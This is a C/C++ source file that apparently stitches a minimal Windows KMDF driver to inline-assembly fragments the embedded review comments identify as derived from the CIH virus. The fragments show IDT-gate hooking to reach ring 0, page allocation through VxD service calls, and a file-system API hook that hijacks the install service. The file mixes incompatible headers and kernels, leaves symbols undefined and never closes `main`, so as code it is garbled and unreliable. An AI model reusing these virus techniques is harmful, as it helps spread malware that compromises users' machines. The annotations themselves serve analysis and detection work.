  1. #include <stdio.h>
  2. #include <emmintrin.h>
  3. #include <omp.h>
  4. #include <ntddk.h>
  5. #include <iostream>
  6. #include <wdf.h>
  7. #include <asm.h>
  /* NOTE(review): the includes above mix user-mode C++ headers (<iostream>,
   * <omp.h>, <emmintrin.h>) with kernel-mode WDK headers (<ntddk.h>, <wdf.h>),
   * and <asm.h> is not a standard header. A kernel driver cannot link the CRT
   * and STL that <iostream> pulls in, so this file is not buildable as written. */
  using namespace std;
  /* A user-mode entry point declared next to a kernel driver entry point; the
   * two cannot coexist in one image. Left as found. */
  int main();
  /* Declare the two callbacks with the WDK function-role types so they are
   * checked against the expected DriverEntry / EvtDriverDeviceAdd signatures. */
  DRIVER_INITIALIZE DriverEntry;
  EVT_WDF_DRIVER_DEVICE_ADD KmdfSmallEvtDeviceAdd;
  12.  
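  /*
   * DriverEntry - KMDF driver entry point.
   *
   * DriverObject: driver object supplied by the I/O manager.
   * RegistryPath: the driver's service registry key. Both are passed straight
   *               to WdfDriverCreate, which registers KmdfSmallEvtDeviceAdd as
   *               the EvtDriverDeviceAdd callback.
   *
   * Returns the NTSTATUS from WdfDriverCreate. On failure the framework never
   * loads the driver, so there is nothing to clean up here.
   */
  NTSTATUS DriverEntry(_In_ PDRIVER_OBJECT DriverObject, _In_ PUNICODE_STRING RegistryPath)
  {
      NTSTATUS status;
      WDF_DRIVER_CONFIG config;

      KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "KmdfSmall: DriverEntry\n"));
      WDF_DRIVER_CONFIG_INIT(&config, KmdfSmallEvtDeviceAdd);
      status = WdfDriverCreate(DriverObject, RegistryPath, WDF_NO_OBJECT_ATTRIBUTES, &config, WDF_NO_HANDLE);

      if (!NT_SUCCESS(status)) {
          /* Report the failure instead of printing the greeting regardless of outcome. */
          KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_ERROR_LEVEL, "KmdfSmall: WdfDriverCreate failed 0x%08X\n", status));
          return status;
      }

      /* The original line was `DbgPrint("Privet! Udachi Bratan (" ^.^ "");`,
       * a syntax error (an unquoted `^.^` between two string literals).
       * Rebuilt as a single literal. DbgPrint takes a format string; a fixed
       * literal containing no `%` is safe to pass directly. */
      DbgPrint("Privet! Udachi Bratan (^.^)\n");

      return status;
  }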
  26.  
  /*
   * KmdfSmallEvtDeviceAdd - EvtDriverDeviceAdd callback.
   *
   * Driver:     the framework driver object; unused here.
   * DeviceInit: framework-allocated device-init structure, consumed by
   *             WdfDeviceCreate (which is why it is passed by address).
   *
   * Creates one framework device object with default attributes and returns
   * WdfDeviceCreate's status. The device handle is not retained: no queues,
   * device interfaces or context are set up on it.
   */
  NTSTATUS KmdfSmallEvtDeviceAdd(_In_ WDFDRIVER Driver, _Inout_ PWDFDEVICE_INIT DeviceInit)
  {
      WDFDEVICE device;

      UNREFERENCED_PARAMETER(Driver);
      KdPrintEx((DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "KmdfSmall: KmdfSmallEvtDeviceAdd\n"));

      /* Nothing further is done with the device, so the status is returned as-is. */
      return WdfDeviceCreate(&DeviceInit, WDF_NO_OBJECT_ATTRIBUTES, &device);
  }
  37.  
  /*
   * main - not a C/C++ function in any usable sense. Its "parameter list"
   * (ASM-BIOS) is invalid, each asm( ... ) block is bare Intel/MASM-syntax
   * text (`dd`, `$`, `label:`, `sym = $`) that neither MSVC __asm nor GCC's
   * string-based asm() accepts, and the function is never closed: the listing
   * ends at the final `);` with no matching `}`.
   *
   * Read literally, the instructions describe a ring-3 to ring-0 escalation
   * via a rewritten IDT entry, followed by installing a file-system API hook.
   * Symbols referenced but never defined in this listing: @1, @2, @3, @6,
   * StopToCode, RestoreSE, MyExceptionHook, MyVirusStart, FileSystemApiHook,
   * OldInstallFileSystemApiHook, InstallFileSystemApiHook, HookExceptionNumber.
   * The `int 20h` + `dd <service id>` calls are the Windows 9x VxD service
   * convention (VMM / IFSMgr), i.e. a different kernel from the NT-family WDF
   * code earlier in this file; the two cannot run in one image.
   *
   * NOTE(review): the identifiers and the exact sequence closely resemble the
   * published CIH (1998) source. Treat this as malware-derived reference
   * material for detection/analysis work, not as buildable code.
   */
  int main(ASM-BIOS)
  {

  /* Ring3 Initiation: `xchg eax, fs:[ebx]` with ebx = 0 swaps a pointer to a
   * stack slot into fs:[0]; on 32-bit Windows that is the head of the SEH
   * handler chain, so this presumably installs an exception handler (the
   * ReadyRestoreSE / RestoreSE labels below are consistent with restoring it).
   * `call @0` / `pop ebx` is the usual position-independent trick to load the
   * current EIP into ebx for the `StopToCode-@0[ebx]` addressing. */

  asm(
  lea eax, [esp-04h*2]

  xor ebx, ebx
  xchg eax, fs:[ebx]

  call @0
  @0:
  pop ebx

  lea ecx, StopToCode-@0[ebx]
  push ecx

  push eax
  );

  /* Ring0 Initiation: `sidt` dumps the IDT base, ebx is pointed 4 bytes into
   * gate HookExceptionNumber (8-byte gates), and the low/high halves of that
   * gate's handler offset ([ebx-04h] and [ebx+02h], i.e. gate bytes 0-1 and
   * 6-7) are saved into ebp and replaced with the address of MyExceptionHook.
   * The `int HookExceptionNumber` that follows then runs MyExceptionHook at
   * ring 0. This depends on ring-3 code being able to write the IDT, which
   * is the Windows 9x weakness the technique relied on. */

  asm(
  push eax ;
  sidt [esp-02h] ; IDT Adress
  pop ebx ;

  add ebx, HookExceptionNumber*08h+04h ; ZF = 0

  cli

  mov ebp, [ebx] ; EXDBS
  mov bp, [ebx-04h] ; Enter Point

  lea esi, MyExceptionHook-@1[ecx]

  push esi

  mov [ebx-04h], si ;
  shr esi, 16 ; MOD'Y
  mov [ebx+02h], si ; Enter Point

  pop esi

  int HookExceptionNumber ; GenerateException
  ReturnAddressOfEndException = $
  );

  /* Return path after the exception: re-enables interrupts and jumps to
   * RestoreSE, which is not part of this listing. */

  asm(

  ReadyRestoreSE:
  sti

  xor ebx, ebx

  jmp RestoreSE
  );

  /* ExitRing0Init: writes the saved 16-bit halves (bp, then ebp >> 16) back
   * into the IDT gate, undoing the hook installed above. The original label
   * "Ring3 Alloc Script" did not describe this. */

  asm(
  ExitRing0Init:
  mov [ebx-04h], bp ;
  shr ebp, 16 ; Restore BinAccess
  mov [ebx+02h], bp ;
  );

  /* Ring-0 body, reached from inside the hooked interrupt handler.
   * `mov dr0, ebx` writes debug register DR0 as an "already resident" marker
   * (per the inline comment) -- a non-zero DR0 is therefore an observable
   * artifact of this code. The eight pushes, `int 20h` and `dd 00010053h`
   * form a VxD service call to VMM _PageAllocate (per the inline comment);
   * its result is moved into edi. eax is loaded with MyVirusStart-@2[esi]
   * immediately before `iretd`, presumably as a return value for the ring-3
   * code that resumes. */

  asm(
  mov dr0, ebx ; Set the Mark of My Virus Exist in System

  push 00000000fh ;
  push ecx ;
  push 0ffffffffh ;
  push ecx ;
  push ecx ;
  push ecx ;
  push 000000001h ;
  push 000000002h ;
  int 20h ; VMMCALL _PageAllocate
  _PageAllocate = $ ;
  dd 00010053h ; Use EAX, ECX, EDX, and flags
  add esp, 08h*04h

  xchg edi, eax ; EDI = SystemMemory Start Address

  lea eax, MyVirusStart-@2[esi]

  iretd ; Return 0 ()
  );

  /* InstallMyFileSystemApiHook: registers FileSystemApiHook through the
   * IFSMgr_InstallFileSystemApiHook service (`dd 00400067h`, per the inline
   * comment), stores the previous hook address in DR0, then overwrites the
   * service's own entry point with InstallFileSystemApiHook so that later
   * callers of the service are intercepted as well. The hook body itself is
   * not in this listing. The block ends with `cli` and a jump to
   * ExitRing0Init rather than a return. */

  asm(
  InstallMyFileSystemApiHook:

  lea eax, FileSystemApiHook-@6[edi]

  push eax ;
  int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
  IFSMgr_InstallFileSystemApiHook = $ ;
  dd 00400067h ; EAX ECX EDX Perms And Flags

  mov dr0, eax ; Save OldFileSystemApiHook Address

  pop eax ; EAX = FileSystemApiHook Address

  ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
  mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
  mov edx, [ecx]
  mov OldInstallFileSystemApiHook-@3[eax], edx

  ; Modify IFSMgr_InstallFileSystemApiHook Entry Point
  lea eax, InstallFileSystemApiHook-@3[eax]
  mov [ecx], eax

  cli

  jmp ExitRing0Init
  );